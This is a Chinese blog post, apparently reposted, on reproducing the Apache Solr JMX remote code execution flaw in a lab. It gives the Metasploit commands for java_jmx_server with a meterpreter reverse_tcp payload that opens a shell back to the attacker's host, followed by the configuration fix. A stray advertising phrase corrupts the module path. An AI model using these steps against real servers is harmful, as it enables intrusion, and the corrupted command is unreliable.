如何进行Apache Solr JMX服务RCE漏洞复现


这篇文章将为大家详细讲解有关如何进行Apache Solr JMX服务RCE漏洞复现,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。该漏洞源于默认配置文件solr.in.sh中的ENABLE_REMOTE_JMX_OPTS配置选项存在安全风险。 Apache Solr的8.1.1和8.2.0版本的自带配置文件solr.in.sh中存在ENABLE_REMOTE_JMX_OPTS=”true”选项。如果使用受影响版本中的默认solr.in.sh文件,那么将启用JMX监视并将其暴露在RMI_PORT上(默认值= 18983),并且无需进行任何身份验证。如果防火墙中的入站流量打开了此端口,则具有Solr节点网络访问权限的任何人都将能够访问JMX, 并且可以上传恶意代码在Solr服务器上执行。该漏洞不影响Windows系统的用户,仅影响部分版本的Linux用户。Apache Solr8.1.1版本上线时间:2019-05-28Apache Solr8.2.0版本上线时间:2019-07-25 如果受害者使用了该默认配置,则会在默认端口18983开放JMX服务,且默认未开启认证。任何可访问此端口的攻击者可利用此漏洞向受影响服务发起攻击,执行任意代码。Java环境和kali系统、Solr 8.20Solr 8.20 下载地址:wgethttp://archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.zip使用unzip solr-8.2.0.zip解压解压完成后,切换到bin目录启动Solr./solr start -force启动后访问:http://192.168.10.176:8983/攻击机:kali IP:192.168.10.147受害机:Ubuntu18.6中docker IP:192.168.10.184:89831、使用nmap扫描端口后发现18983端口开启2、使用Metasploit中的exploit/multi/misc/免费云主机域名java_jmx_server模块进行漏洞复现use exploit/multi/misc/java_jmx_serverset RHOST 192.168.10.184set RPORT 18983再来设置payload:java/meterpreter/reverse_tcpset payload java/meterpreter/reverse_tcpset LHOST192.168.10.147set LPORT 44443、使用run执行,即可看到成功建立连接将solr.in.sh配置文件中的ENABLE_REMOTE_JMX_OPTS选项设置为false,然后重启Solr服务。关于如何进行Apache Solr JMX服务RCE漏洞复现就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。

相关推荐: 积累项目经验-完整版系统集成项目实现全过程

无论线下还是线上课程,很少直接涉及到实际项目的商务具体操作, 特别是技术和项目的紧密结合,技术如何和商务技巧的结合,这种系统的学习是所有其他同类课程中没有的。我们的“完整版系统集成项目实现全过程”正是围绕技术和项目结合、技术和商务结合为目标,进行的系统的实操视…

免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。

Like (0)
Donate 微信扫一扫 微信扫一扫
Previous 02/07 15:43
Next 02/07 15:43